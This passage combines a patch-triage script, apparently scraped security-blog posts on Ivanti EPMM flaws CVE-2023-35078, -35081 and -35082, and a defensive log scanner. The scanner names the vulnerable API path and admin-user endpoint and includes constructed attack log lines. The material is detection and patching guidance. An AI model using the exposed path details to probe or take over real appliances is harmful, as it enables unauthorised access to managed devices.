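    """One row per finding: overdue items first, then by priority, then by due date."""
    rows = [{
        "host": f.host, "advisory": f.advisory, "priority": classify(f),
        "due": due_date(f), "overdue": is_overdue(f, today),
        "patched": f.patched is not None,
    } for f in findings]
    rows.sort(key=lambda r: (not r["overdue"], PRIORITY_RANK[r["priority"]], r["due"]))
    return rows


# Constructed inventory (sample values, not a real scan). LAB-* are placeholder
# identifiers for internal items with no public advisory.
SAMPLE_FINDINGS = [
    Finding("epmm-01", "CVE-2023-35078", 10.0, date(2023, 7, 25), True, True),
    Finding("epmm-01", "CVE-2023-35081", 7.2, date(2023, 7, 28), True, True),
    Finding("epmm-02", "CVE-2023-35078", 10.0, date(2023, 7, 25), True, False,
            patched=date(2023, 8, 1)),
    Finding("fs-01", "LAB-0002", 7.5, date(2023, 7, 20)),
    Finding("lab-05", "LAB-0001", 5.3, date(2023, 7, 1)),
]


def run_sample() -> List[Dict[str, object]]:
    """Triage the constructed inventory as of an assumed report date."""
    return triage(SAMPLE_FINDINGS, date(2023, 8, 15))


if __name__ == "__main__":
    for r in run_sample():
        state = "OVERDUE" if r["overdue"] else ("done" if r["patched"] else "open")
        print(f'{r["host"]:8} {r["advisory"]:15} {r["priority"]:8} due {r["due"]} {state}')
```

The point of the classifier is that a raw CVSS number is a poor sole input: a 7.2 that is being exploited in the wild on an internet-facing appliance outranks a 9.8 on an isolated lab box, and the deadline should follow the priority rather than the score.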

How to Protect Against Zero-Days?

It is crucial to understand that the threat landscape keeps changing and new zero-day vulnerabilities appear frequently. To stay informed about the latest ones, follow reliable cybersecurity sources and keep up with current events in the industry.

Moreover, Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR) solutions are gaining importance in today's cybersecurity landscape. They work best when combined with a zero-trust model of protection.

Applying updates promptly is essential: it removes known vulnerabilities and reduces risk. Combining that with EDR and XDR solutions built on a zero-trust architecture lets organizations detect, respond to and mitigate threats more efficiently, whether they involve known vulnerabilities or zero-day exploits. These technologies build a strong security posture around continuous monitoring, verification and adaptive response to evolving threats, which helps maintain a secure environment.

Ivanti EPMM Vulnerability Patch is Vulnerable https://gridinsoft.com/blogs/ivanti-epmm-patch-fix-vulnerable/ https://gridinsoft.com/blogs/ivanti-epmm-patch-fix-vulnerable/#respond Thu, 03 Aug 2023 14:08:52 +0000 https://gridinsoft.com/blogs/?p=16532 Ivanti, the provider of a wide range of management solutions for corporations, has apparently taken up the baton from Ipswitch, the vendor of the infamous MOVEit MFT. Analysts discovered two severe vulnerabilities in its EPMM over the last 10 days, and the company released urgent fixes. However, the patch for CVE-2023-35078 appears to be… Continue reading Ivanti EPMM Vulnerability Patch is Vulnerable

The post Ivanti EPMM Vulnerability Patch is Vulnerable appeared first on Gridinsoft Blog.

]]>
Ivanti, the provider of a wide range of management solutions for corporations, has apparently taken up the baton from Ipswitch, the vendor of the infamous MOVEit MFT. Analysts discovered two severe vulnerabilities in its EPMM over the last 10 days, and the company released urgent fixes. However, the patch for CVE-2023-35078 appears to be bypassable by the same pattern of attack.

Ivanti EPMM Vulnerabilities Keep Going

On July 25, 2023, Ivanti released a note about a vulnerability in its EPMM device management software. It offered a patch for the flaw, CVE-2023-35078, which allowed hackers to bypass authentication and reach the application's API with its full functionality. Unsurprisingly, it received the top CVSS rating of 10/10. The bad news is that the vulnerability had reportedly been exploited since April 2023. The patch offered by the company was supposed to close off that unauthorised access.

CVE-2023-35078 exploitation heatmap
Heatmap of CVE-2023-35078 exploitation by countries

Soon after, another security loophole was discovered. CVE-2023-35081 is a path traversal vulnerability that lets an attacker who holds administrator privileges write arbitrary files to the appliance. Unfortunately, it was exploited on roughly the same scale as the previous one: hackers chained the two within a single attack, using CVE-2023-35078 to gain admin access and CVE-2023-35081 to plant files on the server.

The thing is, not everything is ideal with the patched CVE-2023-35078 either. Researchers found a way to pull off essentially the same trick on the patched version that hackers used earlier. The new flaw, assigned CVE-2023-35082, affects older EPMM versions, 11.2 and below. Even after the patch, the application could not provide a sustainable level of security. Fortunately, no cases of exploitation of this vulnerability have been discovered yet. But as we know, once a 0-day vulnerability becomes an n-day, its usage becomes much more widespread.

How to protect against CVE-2023-35082?

The only truly effective advice is to update Ivanti EPMM to a version newer than 11.2. Rolling such an update out across a huge fleet of devices at once can be troublesome, but that effort is far preferable to cleaning up after a cyberattack. There are also several other measures, not preventive, but still effective.

Adopt cybersecurity solutions with a zero-trust policy. The most damaging modern cyberattacks come through vulnerabilities in trusted software, so the only answer is to trust nothing by default. EDR/XDR solutions built around this concept have their downsides, but the effectiveness of their protection is beyond doubt. Whether it is a hand-made utility or a program with over a million users, every action it takes gets checked.

Use UBA and SIEM to improve visibility and response across the environment. The zero-trust systems above benefit greatly from additional sources of information, which is almost essential in large networks made up of different kinds of devices. Being aware, and being able to respond as quickly as possible, is vital in modern cybersecurity, where the clock can run in minutes.

Ivanti 0-day exploited to target Norwegian government https://gridinsoft.com/blogs/ivanti-zero-day-norwegian-government/ https://gridinsoft.com/blogs/ivanti-zero-day-norwegian-government/#respond Tue, 25 Jul 2023 18:10:21 +0000 https://gridinsoft.com/blogs/?p=16297 Ivanti has patched a zero-day vulnerability in its Endpoint Manager Mobile (formerly MobileIron Core) that allowed authentication bypass. This vulnerability had the maximum CVSS score and was actively exploited to gain unauthorized access. What is Ivanti Company? Ivanti is an IT software company headquartered in Utah, United States. It produces a variety of IT management and security… Continue reading Ivanti 0-day exploited to target Norwegian government

The post Ivanti 0-day exploited to target Norwegian government appeared first on Gridinsoft Blog.

]]>
Ivanti has patched a zero-day vulnerability in its Endpoint Manager Mobile (formerly MobileIron Core) that allowed authentication bypass. This vulnerability had the maximum CVSS score and was actively exploited to gain unauthorized access.

What is Ivanti Company?

Ivanti is an IT software company headquartered in Utah, United States. It produces a variety of IT management and security solutions, and its products are used by many organizations, including businesses, government agencies and educational institutions. For example, almost all Norwegian ministries use Ivanti Endpoint Manager Mobile, with only a couple of exceptions. Having such important clients is always a huge responsibility, and unfortunately not everyone is capable of mitigating all the risks.

Ivanti EPMM 0-day Vulnerability

The Australian Cyber Security Centre (ACSC) received reports of a vulnerability in Ivanti EPMM (Endpoint Manager Mobile), also known as MobileIron Core, affecting the supported 11.8, 11.9 and 11.10 releases as well as older, unsupported ones. In brief, the vulnerability, CVE-2023-35078, allows remote access to the API without authentication. It carries the maximum CVSS severity score, 10 out of 10. While Ivanti said it received the information from a reliable source, the company did not disclose further details about the nature of the attacks or the identity of the attackers. Nevertheless, the Norwegian National Security Authority (NSM) confirmed that unknown attackers exploited the vulnerability to attack the Norwegian Security and Service Organisation (DSS), which provides IT services to the ministries. The attackers therefore likely accessed and stole sensitive data from the compromised platform.

On Sunday the company released a security patch, which users can install by upgrading to EPMM 11.8.1.1, 11.9.1.1 or 11.10.0.2. Outdated, unsupported versions below 11.8 have also received a fix.

CVE-2023-35078 Details

CVE-2023-35078 is a zero-day authentication bypass vulnerability. It provides remote, unauthenticated API access to specific paths. An attacker can read personally identifiable information such as usernames, phone numbers and other mobile device details on the vulnerable system. An attacker can also make configuration changes, including creating an EPMM administrator account and using it for further changes. The vulnerability affects all supported versions of EPMM (11.10, 11.9 and 11.8) and earlier unsupported releases; it is patched in 11.10.0.2, 11.9.1.1 and 11.8.1.1. Since CVE-2023-35078 has the maximum CVSS score of 10.0 and is easily exploitable, experts strongly recommend updating all appliances, even end-of-life ones. If an appliance cannot be updated, take it offline.

CVE-2023-35078 vulnerability heatmap by countries image
CVE-2023-35078 vulnerability heatmap by countries

In addition, Ivanti published a password-protected security advisory that only customers with login credentials can read, which is perplexing. The company also clarified that the vulnerability was not used in a supply chain attack. The IoT search engine Shodan found more than 2,900 MobileIron user portals exposed on the Internet, mainly in the US and Europe; about 30 of them belong to local and state governments in the United States. The largest numbers of exposed servers are in the US, Germany, the UK and Hong Kong. The Norwegian National Cyber Security Centre has notified all known system owners in the country with MobileIron Core reachable from the Internet about the security update.

How to secure against Ivanti 0-day vulnerability?

Well, the Norwegian government is not Ivanti's only client. Companies from all corners of the world use its software, which turned out to have a soft spot where no one expected one. Here are some steps you can take to secure against the Ivanti 0-day vulnerability.

  • Apply the latest security patches. This is the first action to take, since Ivanti has released a patch for the vulnerability; apply it as soon as possible to protect your organization.
  • Use multi-factor authentication (MFA). MFA adds a layer of security by requiring users to present two or more proofs of identity, which makes it harder for attackers to use stolen credentials. Keep in mind that it protects logins only: a bug like CVE-2023-35078 skips authentication entirely, so MFA complements the patch rather than replacing it.
  • Monitor your IT systems for suspicious activity, such as unauthorized access attempts, unexpected new administrator accounts or unusual traffic patterns. This helps you identify and respond to attacks early.
  • Educate your users about security best practices. Users are the first line of defense against cyberattacks, so teach them, for example, to avoid clicking suspicious links or opening attachments from unknown senders.

By following these steps, you can help to protect your organization against the 0-day vulnerability and other cyberattacks.
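One way to act on the monitoring step, for this post and for the EPMM patch post above, as an added example that is neither Ivanti's nor Gridinsoft's code: scan the appliance's web access log for successful requests to the API that CVE-2023-35078 exposes coming from sources that are not your management hosts, and separately for writes to the admin-user endpoint, which would correspond to the administrator-account creation described in the CVE details. Assumptions: the log is in Apache/nginx combined format; the API path prefix is the one public advisories associate with this bug but is kept as a single configurable constant you should confirm against vendor guidance; the management allowlist and every log line are constructed for the example, using documentation IP ranges.

```python
"""Scan a combined-format access log for signs of CVE-2023-35078 abuse.

Added example, not vendor code. Assumptions: combined log format; API_PREFIX is
the path public advisories tie to this bug (confirm against your vendor's
guidance); the management allowlist and the sample lines are constructed.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional

API_PREFIX = "/mifs/aad/api/v2/"                 # assumed; verify with the advisory
ADMIN_USERS_PATH = API_PREFIX + "admins/users"   # where admin accounts are managed
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}
MGMT_ALLOWLIST = {"10.20.0.15"}                  # assumed management hosts

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log (not real traffic). 203.0.113.5 behaves like the
# attacks described in the post: enumerate, then create an admin; 198.51.100.9
# is a probe that was rejected; 10.20.0.15 is legitimate admin activity.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Jul/2023:08:12:01 +0000] "GET /mifs/aad/api/v2/ping HTTP/1.1" 200 98 "-" "python-requests/2.31"
203.0.113.5 - - [24/Jul/2023:08:12:03 +0000] "GET /mifs/aad/api/v2/admins/users HTTP/1.1" 200 4182 "-" "python-requests/2.31"
203.0.113.5 - - [24/Jul/2023:08:12:09 +0000] "POST /mifs/aad/api/v2/admins/users HTTP/1.1" 200 210 "-" "python-requests/2.31"
10.20.0.15 - admin [24/Jul/2023:09:00:00 +0000] "GET /mifs/admin/dashboard HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
198.51.100.9 - - [24/Jul/2023:09:30:44 +0000] "GET /mifs/aad/api/v2/ping HTTP/1.1" 401 0 "-" "curl/8.1"
10.20.0.15 - admin [24/Jul/2023:10:05:12 +0000] "GET /mifs/aad/api/v2/admins/users HTTP/1.1" 200 4182 "-" "Mozilla/5.0"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(lines: List[str], allowlist=MGMT_ALLOWLIST) -> Dict[str, Dict[str, object]]:
    """Per non-allowlisted source IP: successful API hits, admin-user writes, rejected probes.

    The auth-user field is rarely populated for session-based apps, so the
    signal is source IP plus status: this API should answer 2xx only to your
    own management hosts, and the bug makes it answer anyone.
    """
    report = defaultdict(lambda: {"api_hits": 0, "admin_user_writes": 0,
                                  "rejected_probes": 0, "paths": set()})
    for line in lines:
        ev = parse_line(line)
        if not ev or not ev["path"].startswith(API_PREFIX) or ev["ip"] in allowlist:
            continue
        entry = report[ev["ip"]]
        status = int(ev["status"])
        if status in (401, 403):
            entry["rejected_probes"] += 1          # someone is knocking; worth knowing
        elif 200 <= status < 300:
            entry["api_hits"] += 1
            entry["paths"].add(ev["path"])
            if ev["method"] in WRITE_METHODS and ev["path"].startswith(ADMIN_USERS_PATH):
                entry["admin_user_writes"] += 1    # matches the "create an admin" step
    return dict(report)


def suspicious_sources(lines: List[str], allowlist=MGMT_ALLOWLIST) -> List[str]:
    """IPs that received 2xx answers from the vulnerable API, most serious first."""
    rep = scan(lines, allowlist)
    hits = [ip for ip, e in rep.items() if e["api_hits"]]
    return sorted(hits, key=lambda ip: (rep[ip]["admin_user_writes"], rep[ip]["api_hits"]),
                  reverse=True)


def run_sample() -> Dict[str, Dict[str, object]]:
    """Scan the constructed sample log."""
    return scan(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for ip, e in run_sample().items():
        print(f'{ip:15} api_hits={e["api_hits"]} admin_writes={e["admin_user_writes"]} '
              f'rejected={e["rejected_probes"]} paths={sorted(e["paths"])}')
```

A successful write to the admin-user endpoint from an unknown address is the strongest indicator here and should trigger an account review on the appliance, not just an alert. If the log predates the exploitation window (April 2023 per the post), run the same scan over archived logs, since the patch closes the door but does not remove an administrator account that was already created.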
